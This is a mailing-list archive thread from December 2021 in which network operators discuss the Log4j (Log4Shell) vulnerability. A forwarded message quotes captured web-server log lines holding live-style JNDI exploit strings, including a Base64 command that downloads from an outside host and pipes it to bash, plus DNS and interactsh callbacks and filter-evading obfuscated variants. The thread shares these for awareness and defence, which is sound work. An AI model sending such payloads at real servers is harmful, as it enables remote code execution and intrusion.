* [Bloat] Fwd: Log4j mitigation [not found] ` <12CBBEBF-6B38-4924-AA86-E5E94D77513E@ip-clear.de> @ 2021-12-13 13:56 ` Dave Taht 2021-12-13 19:42 ` David Lang 0 siblings, 1 reply; 2+ messages in thread From: Dave Taht @ 2021-12-13 13:56 UTC (permalink / raw) To: bloat for those of you losing sleep over the java logging exploit, my heart goes out to you. While I'm glad I, personally, and on the bufferbloat related websites, haven't got a single thing written in java, and I lost 3 weeks of my life over christmas to spectre, and several weeks per year - and usually, right around christmas! coping with other CVE's.... this one seems so big and affecting so many other services I use, that I just kind of want to take all my cash out of the bank, and log out, and find a tropic island somewhere. ---------- Forwarded message --------- From: Jörg Kost <jk@ip-clear.de> Date: Mon, Dec 13, 2021 at 3:43 AM Subject: Re: Log4j mitigation To: Jean St-Laurent <jean@ddostest.me> Cc: <nanog@nanog.org> You can't see it. The attack vector can hide in HTTP GETs, Posts (SSL), in Headers, in anything related to where a Java process does logging with Log4j; it's innumerable. It might even evaluate from a URI itself; it won't use a fixed port. It's not wormy right now, but maybe it will soon. We are seeing things like this since 10th of Dec. And this is only a typical Apache Logfile for HTTP/HTTPS, where we do logging: ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo} GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281 "${jndi:dns://45.83.64.1/securityscan-http80}" "${jndi:dns://45.83.64.1/securityscan-http80} GET /?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a} HTTP/1.1" 200 - "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}" "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com} -- I tried to build a better future, a few times: https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org Dave Täht CEO, TekLibre, LLC ^ permalink raw reply [flat|nested] 2+ messages in thread
* Re: [Bloat] Fwd: Log4j mitigation 2021-12-13 13:56 ` [Bloat] Fwd: Log4j mitigation Dave Taht @ 2021-12-13 19:42 ` David Lang 0 siblings, 0 replies; 2+ messages in thread From: David Lang @ 2021-12-13 19:42 UTC (permalink / raw) To: Dave Taht; +Cc: bloat [-- Attachment #1: Type: text/plain, Size: 2616 bytes --] Just a note that this doesn't require the code to be written in Java, any language that runs in a jvm can end up having grief. David Lang On Mon, 13 Dec 2021, Dave Taht wrote: > Date: Mon, 13 Dec 2021 05:56:36 -0800 > From: Dave Taht <dave.taht@gmail.com> > To: bloat <bloat@lists.bufferbloat.net> > Subject: [Bloat] Fwd: Log4j mitigation > > for those of you losing sleep over the java logging exploit, my heart > goes out to you. > > While I'm glad I, personally, and on the bufferbloat related websites, > haven't got a single thing written in java, and I lost 3 weeks of my > life over christmas to spectre, and several weeks per year - and > usually, right around christmas! coping with other CVE's.... this one > seems so big and affecting so many other services I use, that I just > kind of want to take all my cash out of the bank, and log out, and > find a tropic island somewhere. > > ---------- Forwarded message --------- > From: Jörg Kost <jk@ip-clear.de> > Date: Mon, Dec 13, 2021 at 3:43 AM > Subject: Re: Log4j mitigation > To: Jean St-Laurent <jean@ddostest.me> > Cc: <nanog@nanog.org> > > > You can't see it. The attack vector can hide in HTTP GETs, Posts (SSL), > in Headers, in anything related to where a Java process does logging > with Log4j; it's innumerable. It might even evaluate from a URI itself; > it won't use a fixed port. It's not wormy right now, but maybe it will > soon. > > We are seeing things like this since 10th of Dec. And this is only a > typical Apache Logfile for HTTP/HTTPS, where we do logging: > > ${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xNDk6NTg3NC8xNzguMjQ4LjI0Mi4xNDE6ODB8fHdnZXQgLXEgLU8tIDE5NS41NC4xNjAuMTQ5OjU4NzQvMTc4LjI0OC4yNDIuMTQxOjgwKXxiYXNo} > GET /$%7Bjndi:dns://45.83.64.1/securityscan-http80%7D HTTP/1.1" 301 281 > "${jndi:dns://45.83.64.1/securityscan-http80}" > "${jndi:dns://45.83.64.1/securityscan-http80} > GET > /?x=${jndi:ldap://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com/a} > HTTP/1.1" 200 - > "${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com}" > "${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://${hostName}.c6rip779l9hq8g7hluigcg5131oyyyt8e.interactsh.com} > > > > -- > I tried to build a better future, a few times: > https://wayforward.archive.org/?site=https%3A%2F%2Fwww.icei.org > > Dave Täht CEO, TekLibre, LLC > _______________________________________________ > Bloat mailing list > Bloat@lists.bufferbloat.net > https://lists.bufferbloat.net/listinfo/bloat ^ permalink raw reply [flat|nested] 2+ messages in thread
end of thread, other threads:[~2021-12-13 19:42 UTC | newest]
Thread overview: 2+ messages (download: mbox.gz / follow: Atom feed)
-- links below jump to the message on this page --
[not found] <CD4B66EC-8FFC-4911-A106-8DF4D7061E0B@andyring.com>
[not found] ` <9c4dc5e1-b35d-6a62-a8fc-cac729f585d1@foobar.org>
[not found] ` <002401d7f00f$c4fa1b60$4eee5220$@ddostest.me>
[not found] ` <41BB6B27-4870-49F2-BD83-354692A01081@ip-clear.de>
[not found] ` <002901d7f012$24093620$6c1ba260$@ddostest.me>
[not found] ` <CAAeewD-kYKf5+1r4jOZpPS1-ZqjAK7-CwadrZtS-LQjtQZgg3w@mail.gmail.com>
[not found] ` <003a01d7f014$fd8c6e10$f8a54a30$@ddostest.me>
[not found] ` <12CBBEBF-6B38-4924-AA86-E5E94D77513E@ip-clear.de>
2021-12-13 13:56 ` [Bloat] Fwd: Log4j mitigation Dave Taht
2021-12-13 19:42 ` David Lang
This is a public inbox, see mirroring instructions for how to clone and mirror all data and code used for this inbox